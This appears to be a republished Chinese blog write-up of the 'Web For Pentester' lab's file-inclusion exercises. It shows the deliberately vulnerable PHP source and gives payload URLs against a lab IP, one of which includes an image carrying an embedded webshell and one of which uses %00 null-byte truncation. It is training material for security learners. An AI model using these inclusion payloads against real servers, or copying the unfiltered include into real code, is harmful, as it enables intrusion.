Web For Pentester1 -File Include
Posted APT-101
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Web For Pentester1 -File Include相关的知识,希望对你有一定的参考价值。
源码:
<?php require_once \'../header.php\'; ?>
<?php
if ($_GET["page"]) {
include($_GET["page"]);
}
?>
<?php require_once \'../footer.php\'; ?>
解释:加载当前目录下的文件,这里page变量没有做任何过滤,因此可以包含任意文件,当脚本来执行
payload:
http://10.10.202.152/fileincl/example1.php?page=../files/hacker.png
使用片马来执行下
http://10.10.202.152/fileincl/example1.php?page=../upload/images/1.jpg
Example 2
源码:
<?php require_once \'../header.php\'; ?>
<?php
if ($_GET["page"]) {
$file = $_GET["page"].".php";
// simulate null byte issue
$file = preg_replace(\'/\\x00.*/\',"",$file);
include($file);
}
?>
<?php require_once \'../footer.php\'; ?>
解释:默认会给文件增加后缀名,另外使用正则过滤00截断,因此可以使用%00 过滤掉后面的%00.php的操作
payload:
http://10.10.202.152/fileincl/example2.php?page=../upload/images/1.jpg%00
以上是关于Web For Pentester1 -File Include的主要内容,如果未能解决你的问题,请参考以下文章
Web For Pentester1 - Commands injection
html for Web Developer Bootcamp的for循环练习